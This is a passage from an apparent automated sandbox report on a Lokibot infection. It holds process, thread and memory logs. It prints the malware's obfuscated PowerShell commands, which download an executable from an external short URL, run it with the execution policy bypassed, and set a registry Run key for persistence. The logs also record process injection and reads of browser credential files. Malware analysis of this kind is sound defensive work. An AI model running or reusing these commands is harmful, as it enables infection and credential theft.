                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\12.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\12.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1484Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1836Thread sleep count: 187 > 30
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1476Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1476Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1900Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1544Thread sleep count: 156 > 30
                Source: C:\Users\user\ntrwe.exe TID: 1192Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2492Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2492Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2500Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1776Thread sleep count: 185 > 30
                Source: C:\Users\user\ntrwe.exe TID: 2784Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: 12.exe, 0000000B.00000003.2176518302.00000000082B9000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess token adjusted: Debug
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: Debug
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\user\ntrwe.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\ntrwe.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
                Bypasses PowerShell execution policyShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
                Source: C:\Users\user\ntrwe.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\12.exe VolumeInformation
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00406069 GetUserNameW,
                Source: C:\Users\user\AppData\Local\Temp\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
